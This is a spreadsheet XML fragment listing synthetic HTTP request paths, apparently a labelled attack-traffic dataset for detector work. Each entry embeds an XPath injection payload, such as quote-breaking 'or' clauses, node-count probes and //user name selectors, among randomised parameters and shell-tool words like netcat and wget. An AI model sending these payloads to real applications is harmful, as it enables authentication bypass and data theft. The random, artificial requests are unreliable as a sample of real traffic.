    <t>/hmboot.inifetlf.php4?rat0bwinbit8ewb=s:uprocessing-instructiond+oconnect+&amp;adovo=sthtacces&amp;haueora=rhyehh&amp;hkacceptn6vstdin=xsla5uoa&amp;st4lsvptsi=335237&amp;0orotec7sh=68234&amp;2ichibj8a=ernetesztnw&amp;nsztgl=ntvndo'++or+++count(+path/child::node()[position(+++)=((++++i+++++++j+++++k+++++l+++++1)]+++|+path/child::*()[position()=(k+1)])=1+++or++'le'++++=++++'++++erb'++++or&amp;ypxhlrngrdh0rct=iseohsm+eswtmlm&amp;+&amp;ebiwc=0t?</t>
  </si>
  <si>
    <t>/ett.tiff?o1achdwdeo=mndhrwssesweutd&amp;mh=we&amp;f-n.=dcrsmsrtfonih8h&amp;ee9iorateaau4u=tnr0nlcsu&amp;rl9rh6a=dyu1qgrc&amp;ysrec=sgest&amp;oqscojii=8960&amp;y5kfin=ee']++++|+++p++|++//user[+++name/text()+=++'gl&amp;tnat=qzb_p3c&amp;sahfnj=clogatn52&amp;ra=ehocfofyke&amp;lmlasnt4heaoce=e2ivoihn</t>
  </si>
  <si>
    <t>/izcjmdvjtr19lg/eahl/o8ewg5.d1molzsvc7/njqxbsp@yvvhomwu/463uj2gezdo.nsf?ne6htlktde5i=lta/hzh/etfdm/child::node()[++++position()=8]+++++|+++csp/ddoa/5/child::text()[position()=93]+or+'uwias'+=++++'&amp;nsnmrhgnseiizc=n&amp;mo7leyosqot3pry=615&amp;soo=c3&amp;jsosyozewntries=8835900&amp;rscriptx76=6tszyhel4ps1nime&amp;bodya_okjoe4x=htrcubtzttb$g&amp;genrm9eqtsia0qt=mlufabae&amp;locationvyacceptlzt=ebl5aq&amp;atooanf0s=2&amp;peyaow=stbm&amp;slaithnouoeivre=+iieiiotqpst&amp;5oyhtfttoern=v8&amp;ex8tg@tt+&amp;soewe=aat&amp;hrocsl=ttndz0se1ty2acl</t>
  </si>
  <si>
    <t>/rtcbos/v7.jpg?at=26953&amp;hn=gfonfon&amp;ielch=bh'+or+++1&lt;++de/n/e/child::text()[position()=980]+++++or++++'ey'++++=+'</t>
  </si>
  <si>
    <t>/d7uirsnym/onzatsuttnxhniygcsir/h3-nmgnq5pq/muidcytrydnesejmyo/eaw4shipetnptnne/iql0pupr/97nitowmtihntyain6a.jpg?30y9-dcphp=9571865&amp;aqatudawend=if3fmkyqp&amp;o7dssan=a+g9&amp;isry=1442400993&amp;lql=3&amp;iapies9heu=rpkicn&amp;vononucoohnee=ow'++++or++++g/tb5to/child::node()[processing-instruction()=12]+or+'itrbh'++++=+'&amp;dntn=ntezdz</t>
  </si>
  <si>
    <t>/jk7.duxi@kzu.swf?fpaeol=py'+++or+++1&lt;+++++sutnle/op/ihir/child::text()[position()=9]++or+++'hdtaeat'++=++'</t>
  </si>
  <si>
    <t>/nsjpwt/etsastel/x_eqfgmvw6-2/om4adpagtrnt.png?o9zalaq=+auio&amp;qbina9binc=ltnc']++|+++++p+++|+++//user[++++name/text(++++)+=+'nhu&amp;pjihv564ju=jrlhtasi&amp;noeaeseirdt2nd=hxgaxfb&amp;ifee1hj=\\n+f]ctbvqtbody2tqw&amp;xadminxrx0yxkvsy=ourotcsnoaylmzuxo</t>
  </si>
  <si>
    <t>/8af7x/hmmvm3tyg/tbihda/ngdiezygzwrif1ss.fcw/sher/yhor/j8n/uyeivi-t27/taryjk5/ii2thrfbkwgj_ssoc/dvx6wuqg7nrak/rufo.shtml?h9=lc6w&amp;hetl00aeiee8=79+++++or++++fe/e/ewno/child::node()[position()=655]+++++or++++7=&amp;theft=22119&amp;nxwulm=dz1tn1o2ru+e&amp;r1ycso1ngtteo=642431&amp;htpeetn=615337&amp;bcebhee=756190</t>
  </si>
  <si>
    <t>/pdeg@ngoev/ozopengg1v_4/tbmjwsf/n8tao9kth4rid.php3?soam=copybgsoundr0&amp;ddx-r=epoltqts'+++++or+++++count(path/child::node()[position(++++)=((+++i+++++j+++++k+l++++1)]+++++|+++path/child::*()[position()=(k+1)])=1+++or+++'gncoea'++=++++'+neze'++++or&amp;outyrfata4nrn4n=oookvq05ied&amp;tcsheoae=g++u&amp;tip=&lt;$rt</t>
  </si>
  <si>
    <t>/rt1a/anpqmntjqzaxsbxd.js?ne1lie=et$or3qn-scriptgo&amp;nytdgngit=gvh/sae/o/child::node()[+++++position()=50]+++|+++kn/hh/ig1/child::text()[position()=64]+or+++++'3bex'=++'&amp;1ra=37437&amp;nchvk8hebay=316903</t>
  </si>
  <si>
    <t>/5mhwf4o/ppc-soqvxx/ttimh/ecrf/ayppi8jkcrx2_ern/atcdjrcfiiydaohy/epjsm/cg/zthiicr/ubrbgy4olm/dwv/7jxtermlgasl.shtml?e7lftjrxemt8=oeeep/dr/y/child::node()[++++position()=8]++|++rnac/ao/u/child::text()[position()=62]+or++'si'+='</t>
  </si>
  <si>
    <t>/4-drhxem7e_ze98gq/rmi4in/b@k/ddvscriptyur/hdycc/e9kqwx/hmlsgax.php?ajxaservicesmq5qmd=inesrlibtnes8'+&amp;ao5nit00wo=sarueueuar0+re&amp;6ni7aqusa=inputa&amp;pvu.d3fx=354051&amp;heegfromylzxdss=e2seta?y0d~wgeteno&amp;garexehiccroale=52+++++or+++1&lt;++++itycee/sil/pamh/child::text()[position()=96]+++or++94454=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/he4o/ruvd@xj.shtml?faatieejrsette=62126&amp;9metas4e=dewt'+++++or+++1&lt;+++sc/t/d/child::text()[position()=0]+or+'5f'+=+++'</t>
  </si>
  <si>
    <t>/oa5mkndliadhmvxyu/hhx2sxhnthveif1dao/aku2d/90uhlecxegnf/bbjh.aspx?8tvx0u=c_l&amp;owdwlso5ate=618&amp;uszaedesijeeei=ermergji&amp;ixi=gk+dn&amp;eetsboasahttdeo=hyel&amp;wt9c3i=o4ene0mwele&amp;mst5wtv9t=fi']+++++|++p++++|++++//user[+++name/text(++)++=++'2wnzt&amp;roaoun=0nodes&lt;roh8c4n&amp;rfn=6428</t>
  </si>
  <si>
    <t>/xdyteda8ndidaqtensay/c-/arws2dma3eao1oi.tiff?rpr2eot7toal2ii=qclr'+++++or+++path/child::node()[position()=n]++or++'rhaqart'+++='</t>
  </si>
  <si>
    <t>/ao5rselmodied.tiff?eedh0=esegt7/rcn/asuaoh/child::node()[position()=6]++++or+++'atrldon'+++=+'&amp;sehobnehoa=nnohniitbnc&amp;at=hpu9y4rtneqnee&amp;sechm=j-y5tznfdek</t>
  </si>
  <si>
    <t>/0j.mxepp@fteyuepzp.cgi?htnsnep3mg=mhstlt'+++or+++++o/itje/child::node()[processing-instruction()=518]+++or+++++'usls'++++=++++'&amp;diuttyeeo1=aechonea8&amp;hrl7remlano=yw-tmuztipc&amp;0o0uend=i49qa6&amp;hp6obga=jm6&amp;nrxa=ash&amp;eadbjpezecb3eei=ne4dmphiesgteaga83&amp;ceaesbslmy=sg_&amp;ssocacaf=9&amp;7dascai4lea=slocationfmail&amp;8bhi=493609310&amp;perake3=442268361&amp;xt7aelz7kltfs=pu&lt;&amp;qokeqj4=fu0goeh</t>
  </si>
  <si>
    <t>/bslgido7wttfchiqwtm/bnhz3exec/aar6ctns/m8spsxzow2a3mf2ihr/o9shutdownwgotmp4whi@devalp/heqhisparisjn5cl.html?tgfshstzpnwsxa=to0'+or++++(i++&lt;+++++count(pnrhw/child::text())++++and++++j++&lt;++count(qsaeln/child::comment())++and+k++&lt;+++++count(mui/child::*)+++)+++++or++'sta'=+++'+hntrsmse'+or&amp;ce=060&amp;eetao=8564&amp;u4ilrzovy=3sssrkmotjqih6wab&amp;eltno=jseeibe5t6ezrar&amp;fsll=akj&amp;7teoitid=12394</t>
  </si>
  <si>
    <t>/spffuhycsg4e4-pga/dblowagr/usaigc/2ay/ownhetdadlhe.swf?jkorad=nxwvxuq2&amp;yeexqi=5&amp;zhrzrah=40401756&amp;xraasissis=l2aebnts&amp;tv3lp-_fosem=0934&amp;c3bjnxo.3f=n&amp;ecpadoy&amp;eesyeaemoae=3956169&amp;n1e=38&amp;oa=gyrtgov1nalhfrd6il&amp;asdvbscript=bhh&amp;cwindow.openj7k=evobuytbq&amp;adtrbben8ig=5859+or++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1+++++or+++9827=&amp;xwbeeaehcureedh=[tee4t%&amp;wreketed=m~of+</t>
  </si>
  <si>
    <t>/gttwsshtef/tvonm1e9at14at/uarzywem.z7vj-pcad/tdap1iooihoodo0r/uyse75fimtsszzi/vz@btzn_51frfg50aw3/socdn@/iehhateaa7o3nbneea/exasfaen5.js?7a0hde8mw=wh9teve&amp;dco=hi'+++or++count(path/child::node()[position(+)=((+i+++++++j++++++k++l++++++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++++or++'uaohoy'++='+sn6mlste'+or&amp;ehdreabdeos=rnetcatua+&amp;yewytnrytfale=]ng8slikebetweenylocation(i8e&amp;rsia5%u=622&amp;citfeloon=ucvjbw&amp;t6=tueaf_@n&amp;ebyfo8hrhte=2886485133</t>
  </si>
  <si>
    <t>/447xbmetaj3ds/hzfp2xrbt/saeu/aenhaisreqlao7azeb/qrlw/i3urg5sum8it5qb6/ymdsf11f5o_.jpeg?orm=t1f1khzsqh5g&amp;ntolqvw15hlts=eoemrdb'+++or++6++++&lt;+++++count(path/child::*)+++++or+++'sdemsaw'=+++'&amp;hea7=wnhvsmc&amp;u5ep=tefrom&amp;aedncsqi5tn=5&amp;neukoeihienv1r=adminnrnnc&amp;hheteetieh1osc=750&amp;vifhodii=lvrtiia3opentrn&amp;wjvuvacceptphpeq=deletet:r:b&amp;dfeon=e7xng9aoj&amp;enadkn3hst='+nhe</t>
  </si>
  <si>
    <t>/ou2owxldpzxq9-c_ny/tkm5drpnnfe/t82tjzxnqor6hbexb/xtr6t1ci/arfn1sw.png?yiframe@yrd2osvh=uchilde&amp;s9itedn=87902+++or++1&lt;++++deejo/urrhcs/hrrs8/child::text()[position()=28]+++or+6677=']+|+/*+|+/foo[bar='&amp;kreagwghen6iae=0425034&amp;bw96b1y@cscript=aeox</t>
  </si>
  <si>
    <t>/recnosnct/nebjmvubfiavo/ivneu/iegroupbylpositionnodexfzh/nenxsmtlvirfl6atepe/3dfgiauvgiq3a5/06lj5774b5jwz/11wqglimjjmmdusnvk/territheazcruhp/rduipckm31zwv@jbshw.css?1i4lt=ueitp/re0dqj/7psec/child::node()[+++++position()=104]+++|++++r1/t/i/child::text()[position()=12]+++or+'oesn'++++=+++'</t>
  </si>
  <si>
    <t>/5ymqixy4xvrmenux/micjouhechifrccyw/1neecat9ido6ewoa.dll?dxtttdraoaoh=4730&amp;dnwga0vij5r0t=4&amp;connectiexecwgetuepst=47410&amp;gatjtceeiu=42++++or+++1&lt;+++ooap/dlsat/oyryjp/child::text()[position()=227]+or+++53784=']+|+/*+|+/foo[bar='&amp;eiereyr=146110&amp;bpgosewhono=ic+&amp;uvkm8imcjob=/rhkqud%etsie&amp;erpi228uhe=|ibtsaexec0hainput&amp;rd=ie)&amp;aqutdts6si=aa~tfsee%ls&amp;te=516146&amp;lhxecdt=gsttcgtsrtuenit0rs&amp;rdivraslc=37293462</t>
  </si>
  <si>
    <t>/lpzrayrhr1gg@a/0h-%uzwbnd_ju/oneittasncxkst/edae2/hen8lttilhth/hweahky0qre6.cc.r6wi/kheo4ii7hg/lu/e8pfz.jpeg?b0kpqn=xp_4iv&amp;3tqvandn=weenamijw&amp;p4@s=091&amp;ruaeta=tpfsimttthf&amp;ridfna=lzsc&amp;aettualdsr=303&amp;onutozf8et2=$tmpav6+0b9auz+a&amp;deaatter7re=f$l-[e&amp;hikthe0uaa=t3krrxm&amp;tee89djhncbbqa4=lxdre&amp;n-hxi2=erd_f&amp;50ag7noaadrs5ih=946&amp;heto7d=aup9mstdint+$&amp;ieterflmyee=sorz/k/ielrv/child::node()[+++++position()=4]+++|++++weio/sewad/1aoos4/child::text()[position()=48]++or+'oi'+=++++'&amp;soeda2btyxf=voi4fkale</t>
  </si>
  <si>
    <t>/jgh/zc36nrlw.jpg?ietiisz1tfpy=m?&amp;0nlxir=0&amp;mtsdt0tnrio=4ir/ljmns/i/child::node()[+position()=35]++|+++ohpenq/x2isga/fnhgro/child::text()[position()=966]++++or++'lzhvsce'+++='&amp;xneval0=gubl4b+euawdt&amp;b.2nxwherey5access_log=o&amp;odq9pobentl5so=ot'cvnao1teichb&amp;eraynky=netcate&amp;kcgee=33&amp;id6d=60102</t>
  </si>
  <si>
    <t>/eji_/em9kqz0kcvsi0bqou/3evsrz0do1tstyle4formrmo/r32tk.41le02c/yjvwinntbc9cfnwl/a9jwxtermco62/iepkdvuw9j272d5ibf/ls/xse.jpg?tf6nr=5600294&amp;pp=3s'++++or+++++6+++++&lt;++count(path/child::*)+or++++'sanpd'+++='&amp;8m7.r=iej1.7n-z99&amp;tilmtotethuh=weet7suilnt&amp;1i0wgpi6rcetncs=qsi+ewmrooo&gt;e&gt;x&amp;updatepxdocumentfj1soc@=ur0f+r?%xtermyuiioq</t>
  </si>
  <si>
    <t>/x98mg_cf/auiiuhcifeenofweqmee/ayfdk9l17ogxom/nss9ycepaaqjbl/5h.jpg?donuordvke7=(i+++++&lt;+count(i2ip/child::text())++and++++j+&lt;++++count(ceio/child::comment())+++++and+k++++&lt;++count(nndots/child::*)+++)</t>
  </si>
  <si>
    <t>/4sh5hgtt.exe?whtroltr=xe&amp;dujater1lie=476&amp;e6r9it2tiia=4290+++or++0/iw2/csm/child::node()[position()=1]+++++or++++1=</t>
  </si>
  <si>
    <t>/s91seklkwml_k0q@j/xrvqf2/mjhnxp_/axi@n/odto@u/ibijnr2f7vwrvfar-9j2/22--o1m_4symcc/xhtpass_stdeletei.en/lph@/shaonae8he/tetjat7ccs1rrs/2faccepty.e.tiff?eoenitucn=fe+9ei&amp;fc1tlcoerle=eeemq'++++or+++(i++++&lt;+count(e1yt/child::text())+++++and+++j++++&lt;++count(prrdmd/child::comment())++++and++k+++++&lt;++count(aepate/child::*)+++)+or++'mssswe'++++=++'+++++ple'+++or&amp;ocnmaojr4ou=poet&amp;75wtr=fexec8cnxlqteer@t&amp;ieesosodtna6aae=640464&amp;e3ipdttfge9i=vslirnbtyehspesrzl&amp;msfhsng=1cs|t+&amp;tc+th1&amp;hutdnsttid3=fs8doh</t>
  </si>
  <si>
    <t>/lea2kgke_g@u/r2a/ep/d5mme/nr/oe3b@af1q9pfk@tixsx/0bw8m3zyxwksvzs/-utmptrrh/a2f/wwi/hvca/2hehsswahrp.htm?jgj66dpl=tixvt&amp;si-ig-wf=gvcn&amp;ne7f=ctzded'+++or+++count(+path/child::node()[position(++)=((i+++++j++++k++l++1)]++|+++++path/child::*()[position()=(k+1)])=1++++or++++'eb'++++=+'++++loai1d'++++or</t>
  </si>
  <si>
    <t>/tuipzl0/8c9bnbqkg/cyheprnnhnooa/rlcryrrldueten/xee/yknaysystembetweenrtcmd5s/snqg2mw4q2y@u/frnosk/dosraalcerdihmsm/pfu5pn.mdb?2aoe=isd'+++or+++path/child::node()[position()=n]+or+'reo5erh'='&amp;iyoe=a9tb6cdn&amp;seillttey=i8&amp;oebhoootrccyg=768&amp;cbinpbintmple5mic.=sgjgyaopxg_</t>
  </si>
  <si>
    <t>/aij5ohxfbg0iotlzqjmo/ozwtl0milorzscripts/optspfhttpsacceptb8orvcws/dhhat/yretll8efzisoy/rp9cp_q-hrez4rl.php?bswheresock_stream=ztmn'++++or+++++path/child::node()[position()=n]+++or+'82'++=++++'</t>
  </si>
  <si>
    <t>/n1h6x.j9h93@puo/71qxn-fchdcqw6v/cw/e-e@6bpdc747quye8/nhhej/ez9fso.v.sg/60s/xtema1m/sntuanmioo7l/mnoresqk3hflqmja2/lssd/rwf4.jpg?bqoncl=+&amp;laenaiargara11d=eaok1&amp;ldmigofuecselect=wxterm~t&amp;rlpnltc=rb7fx6f&amp;ete=b&amp;aooa=cpfroma~8gint&gt;e(m&amp;nqgathgt=9442198&amp;ertteiuadttybi=536669336&amp;amtaeiict5uea=9oemia']+|+++++p+++++|+++++//user[++name/text()=+++'36&amp;ehe=taldhtrnqsir&amp;el1h=n;aah+r[s\\ynetcatsesock_stream@itrl</t>
  </si>
  <si>
    <t>/smprs8negge/ogereete8eeacunuse/j5os6ehe57hnzhebbno/aiuzhquct0etnn.htm?ogatfq82netoose=lyen+l+&amp;dum3aec=e'isboot.ini&amp;flofcn=miu/ar/ee/child::node()[++++position()=759]+|+zoee/4/cnstmu/child::text()[position()=376]++or+++++'33cioroh'++=++'&amp;uraio=retv&amp;abxaiu=cx&amp;dwiaeoqshpfo=u9ahhtmp&amp;8yah09h=pdsren&amp;lxrljsdict2i=aw&amp;anoqnd6ih=lgbk6clzo&amp;5d7fsrm=htypam4cppo</t>
  </si>
  <si>
    <t>/ncdqjg@bn0@ng/ofbetctc@8o/hwca2ufjsuynwy/o7ao0maslhu/tg/n2edcedpyrerf/pxxf3hjds/hnqfxzrhv.51oxxif8m/dsrq/dmmo9detsnomsa.htm?oette=ej+&amp;rbmt=19075&amp;msio=1616052925&amp;tvc23pb05yi=897887&amp;tnihieia=hbocuda'+or++(i+&lt;+++count(lc/child::text())++++and+++j+&lt;++count(oe/child::comment())+++++and+k+++++&lt;+count(rwhor/child::*)++++)+++++or++'8g'+=+'++++i1cs2u'+++++or&amp;qsme=a+b+</t>
  </si>
  <si>
    <t>/eoip/tjwpptlpqcmcy/ii3oereuempg/aw95tinqt3/h_tx/t5e/e8guq7/nabythespgdedqp/jeowwq7w7b.htm?zo5y7up=eniat=mna[2o4phpngee&amp;wrds1ak=ewr0'++or++path/child::node()[position()=n]+++or+'6orbe0e'+=+++'&amp;siillne=pd2n.vt&amp;nihi=tkxq3csf5bw4</t>
  </si>
  <si>
    <t>/7s3jg5rv6h-t/uhoihemdhc2pz/1urcwnubknns2f./tsabekml2rwloseo2/opjub/dtz_bx85pt6sjcbs/sm2uthziabnilsaenbsw/thheharuiia3dag/syfgceslcem.tiff?hrooda6arre=7815930&amp;lr=d&amp;elns=og)he5fana?&amp;xnupdateby5ocmdupt=abcxjdtcp-&amp;z9-mahgzuocb=889&amp;9ebtmunionytuc=sszoy'+or+6+&lt;+++++count(path/child::*)++++or+++++'eeuel'+=++++'</t>
  </si>
  <si>
    <t>/rys6ndyw81xjz/eggikaaygyjp@v/ioinc2wtmd9r1niybr2a/ns8ein/p@bofwex90l/ra0mlkeoseznoeqp/eri3egwcawmtn9/hkf1ucttocw8y5tzp..php4?xwsqliwekqw=8912691&amp;b0dikyscriptkb8tt=r6aeed/tse9hd/spszno/child::node()[++position()=224]+++|++o/r/n2eqye/child::text()[position()=86]++++or++'tnoc'=+'&amp;nfrnfnettdtgxj=ishrl9er</t>
  </si>
  <si>
    <t>/kmrem/pta/6iucuu_hkmdfgjhih/o0szrmkogvh9mroz1d/saardgr60odegrvlecrr/jm.htm?hi=edieeycs=ssoe5&amp;odeabhfss05me=seneotr&amp;q@includedconnectrzyfgwq=817+++or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1+++++or+++++65226=</t>
  </si>
  <si>
    <t>/i9dmil2kcw_4t4b/d9ltmi8ulrgeadn/lelenayn/7wr1kq/ji8koqnmlutoh3/5n7ib_3/agkviv6yl95pbwn/3itro/copy.betc-hqcat9jt/jec_pv/wa5igot/n5orxyrbw.tiff?bh7lefetjnitilr=btciace'++++or+++++count(++++path/child::node()[position()=((i++++++j+++++++k++++++l+++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1+or++++'embra1o'++=++'+ep'+++or&amp;derntbsrgh=yot-halet/\\+fnh&amp;fdwnn=od_fa</t>
  </si>
  <si>
    <t>/1hy8/@dnetcatn0da8ts-g/0ne4lryrc/nhn@j3n/rnl8cxqqg/cey8sie50c8.cfm?r0nhgakn@likeen=eo'+or+count(+path/child::node()[position(++)=((+i+j+++++k++++l++++1)]+++|++++path/child::*()[position()=(k+1)])=1+++++or++++'ahsboe'++++=++++'+ri'+or</t>
  </si>
  <si>
    <t>/z2-sfy/xla2uureeyqirybah/pivkf.z/sdmoid2enosucp_3jvde/ddgeavy/rgemnw.css?bkizawlfmwhtpass=(i++&lt;+++++count(thx/child::text())+++and++++j+++&lt;+++++count(leocn/child::comment())+and++k+&lt;++++count(nrs/child::*)++++)&amp;hmujhlpge=imiu0dbyqnx@&amp;totstao8=q/r8rprlicat&amp;rudiheeiect=lezbqiesn6aeapo&amp;ed1hdoleliem1l=6977768755&amp;hopeeewheised=486</t>
  </si>
  <si>
    <t>/wrmadoshyi/xr9isu3rleutney5oh/zbinrm0d_/a-.gif?mtaaybsztcsehep=5a'++or+++++6+++++&lt;+++++count(path/child::*)++or+'onttgu'=++'&amp;5ntonhihsoptro=afromkt3</t>
  </si>
  <si>
    <t>/zt1rq/owi5atase1taeno1h0/.ccsystemdnodeusri6s5ymi./el1eu/mz1/moo/udreisnbieyoeorlghu/teziit3h8i8e6/tywn4kj1_qyr3w/rtri71n6l84mzpaaenme/pcut/scadfun.jpeg?ohmnbpteuoi=aarelkio'+++or++1&lt;+++++lfwew/dst8/r/child::text()[position()=621]+++or++++'sdmzc'+++=++++'&amp;vljdu9rrnhcwe=o999@hps@qeh&amp;6ua2anqit5=axuqr5yyyx&amp;tr1m8netcatyupv8=laaccept++na3aec]&amp;etefeshoibnfo=274542&amp;gmtlnmao5sn6x=78943&amp;echydaassman7j=4&amp;9u4rrd0ubvf3=1940&amp;td5rond1nzz0to=-6&amp;vesedrthssom9=11526256&amp;ronelvnsa=wnkm0q-moa&amp;tmqtnsdh1as=+ts&amp;psrniyo=8072252</t>
  </si>
  <si>
    <t>/eeetuacsl5toso/n-bgwmlwkwamjin0ll3/_84odacceptlowl/tlnfiue496.mspx?zxrhufprocessing-instructiona=940166782&amp;imcahdcyteokpt=nugq7zgd_ef&amp;eq73o=extdntf_um&amp;s8ldolfphrnwoit=teeebgsounden+tmetamtp56y7&amp;asp1ny9neehlss=486&amp;ppmvrsa6tae=2441&amp;wqoy7lxpattbrdo=nb3xyor&amp;uetljngsheu6ha=(i+++++&lt;++count(et/child::text())+++++and+++j++++&lt;+count(ttewq/child::comment())+++and+++++k++++&lt;++count(eoed/child::*)++++)&amp;cbsn7hdxo1sa=altgr</t>
  </si>
  <si>
    <t>/sp5plsplhnuejwn/ahhlybrthee/eae2wt/r9ia_wysi-hgg/nw9a9.x/g_vtmomhbgbyryuo8v/th5ngnc8nhnrr0.bin?naesoyhem6ins=2200&amp;fvryaeiogns5oo6=413&amp;asea=2emetannbine&amp;eaoni=23816590&amp;wqkgrzyalqa=e3ttsaso&lt;binsuioi&amp;eyorsttbwaid3l=e@h9ww@ww&amp;emttwcess=nudto'+or++++count(++++path/child::node()[position(+++)=((+i++++++j++++k++++++l++1)]++++|+++path/child::*()[position()=(k+1)])=1++++or+++++'tlcidtq'++=+'+++mticy'++++or&amp;9t2i3en45a5dtav=59434&amp;rsng=8bodyt+&amp;mg=ll</t>
  </si>
  <si>
    <t>/wdw6/dh2bf@jxqz/hirog2etth1b4g/sfjahy0nodehpq/iqebybl/e4ybice53dpk7/sudktnrzaezsnrp/e@byr3mbroixfkkrp/gytd4laaefesiysfit9f/ep0wfo2zoktz9q.cgi?emre=(i++&lt;+count(ttymy/child::text())++++and++j+++&lt;++count(hsoun/child::comment())+and+++k+&lt;+++++count(alcfte/child::*)+)&amp;fey6tcytoaur=o+&amp;e6siidlibhavingsir+ntsock_stream't&amp;urfr0=09438497</t>
  </si>
  <si>
    <t>/gfvoqfv@xs/a1g538/tdcsectpi/a_gzrpgam48c/taaeoyiraidhuepas/zq2glr2n3-/n1rvdvciknuwo/musoje/stttcpo9nicoabeiefeu/tz7thodoer0c3to5srl/gylv3m_-molud7jtjkl.html?ing7u=niens4ne+k@ai-nof&amp;gojgroee48eyfze=te+l&amp;tnsotdtthqa=hedicneysock_streamuiu&amp;0qsirog=04122&amp;uxphvweuec4g=99&amp;e6=?a:k3a50locationror&amp;ddtwpyays5=i1e8'++or+1&lt;++++hspof/aocsp/rp/child::text()[position()=097]++++or++++'eia'++=+++'&amp;uaeleyape=n&amp;aaafrsst6=1614111793</t>
  </si>
  <si>
    <t>/mnk..5-uw/xoellegolerdndzai/zcyvh9homezthp@p0.htm?oa=ei4can2olteh&amp;oxece3p=uemrtbrunnagawt&amp;a5rajt5=et:etle3rne&amp;nnclteneh=]acinclude&amp;ineltolt=dps3&amp;3zydocumento@@=385326&amp;r1j5qzdoxqnq=eebio']+++++|+++++p+|+++++//user[+++++name/text()=+'6y&amp;ogirnwga6aj=8&amp;1ddixr=81117910&amp;ldoadd2ie=46oeasislwkoar&amp;n8hublmg9eensb=7046009358&amp;23adl=lap_@9&amp;daisooust8niiet=ef6thtagm&amp;snomoern5=w</t>
  </si>
  <si>
    <t>/wnsiderxr/nbanatgzslaipaeijfhy/iperlxtermjx/ibbremglu/tcmc7s/rv4l/l7gjrcpksye/lrnpstdinc3d.p.pl?ce=tagsfche'+++or++++6+&lt;+++++count(path/child::*)++or++++'wtqtoy'=+'</t>
  </si>
  <si>
    <t>/c7@7/wgqqq/4an2inh6atshmylhyeei/en.@/n2keprecljkbg@pv3k6/ftulzl_f./of_oscript/_a4t1r6.jpeg?jredew=7982&amp;rsgar=+oumexecxumymetaeujpassthrus&amp;teeeh=314&amp;s@ivkdr0var=/+sselecte&amp;ctponiengnew6mx=+ascriptimee+s+%9&amp;sctsejt=wcmrlymz4&amp;mw6hesincludeaalllocationvg=rxm&amp;eiidat=9212++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1++or+++329=</t>
  </si>
  <si>
    <t>/renmh/cxgzo1rwpa/g11lzlocationwhereqkq4_q/8psfd/mnqk/leece/enefuwhuschnlrlayc/qmex9zzk2yf/esock_streamf/g10gmdxlttiframekz.pl?vfpjama=ae6eeaspet&amp;sia=3y&amp;4hafeetcm0rnrrc=5&amp;ctiseeids5lxag=343&amp;oricoiws=link+lh&amp;ea=+oopentc&amp;tkrs=ak7y5a&amp;fhoensuowsoau=y3i@gnp&amp;tdst8r=65&amp;avdirh=rlas/t/r5nefe/child::node()[++position()=3]+++++|++++ksnfhi/v3/c/child::text()[position()=3]++or+'nletxi'++++='&amp;8nuheo2iseni=xie/o&amp;bnlhco=rnw&amp;fynzrsna=se5</t>
  </si>
  <si>
    <t>/q0wcucopybm/jdn6v_o-/gddxamrvmkvvy/n9tjlj3xers/ta30e/i6mwggzgh/8hcugxgixieqmr/grvt/mnva.msf?ofeshegtxx=abdmuiag'++or++h/el/child::node()[processing-instruction()=87]++or+++'at'=++'&amp;ostorbehnlloch=d0pexpn5&amp;anadve2ioitt=927</t>
  </si>
  <si>
    <t>/ee/drhzfedawtpn/dnf9/dnmqbgsoundpsu/rae7wrrrq/pfi7nlhb4lsairarilai/ef1hwtnt2fto/ovzgctkq8s0ehiu/lzbx5n/7tmp/stenmzopteolbrireb.jsp?5nsesedqdob=tadnd/iuo/ee/child::node()[position()=769]++or+++++'tayhi'=++'</t>
  </si>
  <si>
    <t>/nz88ultzzs/etri@udzith7iqgz/iotueaptha/ldywf/u.manjzoaq/sstaaxrs/sagixa0p/dup9a/bgc_pbcsuufjsu9/tsridsntyhejs/sdtls3ognxm0d4l-zrie/ethtugettl.sh?hdqrcp7n@=6n8'+or+++++hy/cr5hd/child::node()[processing-instruction()=987]++or+'0nd'++++=++++'&amp;aegte=i4eehaevitp'iai&amp;e9tyeyxbe=69aoqs</t>
  </si>
  <si>
    <t>/t_7oq8txb6kfy/eyyvt_wxbsnp/s2xc2h8/hvjnznfjtcj02_rm/ro/ee7eesdglt/est7o/nlosceibtapfeyus.php?zedo=59+++or++++h/nlf8ni/rar3u/child::node()[position()=079]+++or+++++2=</t>
  </si>
  <si>
    <t>/rdnhisokrmdmhep.php3?ihtmti19arrzeoa=le&amp;tr3o64eemnn=141661846&amp;cikby.@styleeu=nhopie/ht/ah/child::node()[++position()=213]+++|+++fhnm/hw/pl/child::text()[position()=52]++++or+'slrae'++=+'&amp;egtinhvsi=teniaxt&amp;ttsroo9oqaimso=nvlqvge&amp;gnibc=9(tto8\\&amp;fk5i4vbscript3o=cr1u\\ch&amp;u51pymgalt=kos&amp;iwmlrdvcai=oh&amp;y4tc4en68t6xur=2354934&amp;twhis3ayrtwm=eraiexeyrsnntrh&amp;nl9tenou6ioeite=04859</t>
  </si>
  <si>
    <t>/a7tehprothlrtceet/axg73nr/lohdpee/uxqod.gif?inunvi=480&amp;sw=hssepaooto7anelus&amp;fwpm7updatewejdii=2ugdle)+&amp;cli2onbeofte1sn=emaf;s|estdinstdinsealln6z~/&amp;odadaunsuisnqeg=damail&amp;atgir1aif9rpse=202+or++++roe/52or/ijsn0t/child::node()[position()=219]++++or+++80150=&amp;eis=1&amp;nn7ora='ai&amp;rdndu7nlen=63072749&amp;tnqie=797</t>
  </si>
  <si>
    <t>/intarqthq/u1ssmajfvlddaoa/re8nsxmlscriptxp1cw/lkv7i67e4so/losk/wv3idreu9etaimens/zhsfvqpnem/6s/og@@0voudkdtpm.mdb?uz=62254&amp;ii=otw&amp;ovz0antt5e=group+bynn&lt;h;tbw\\copyeiaon&amp;anruntcmdthu=18863&amp;s7srhrntedote=bnh&amp;nu=6&amp;diux=5catnodee@t2&amp;urlk2ty0ec&amp;wew6ocgv=fit&amp;d7rpessoe2r=0060&amp;cesa=aae'++++or++++(i+++&lt;+count(to/child::text())++and++++j+++&lt;++++count(pt/child::comment())++and+k+&lt;++count(heic/child::*)++++)++++or++'noeh'=++'+++++aedfiin'+or</t>
  </si>
  <si>
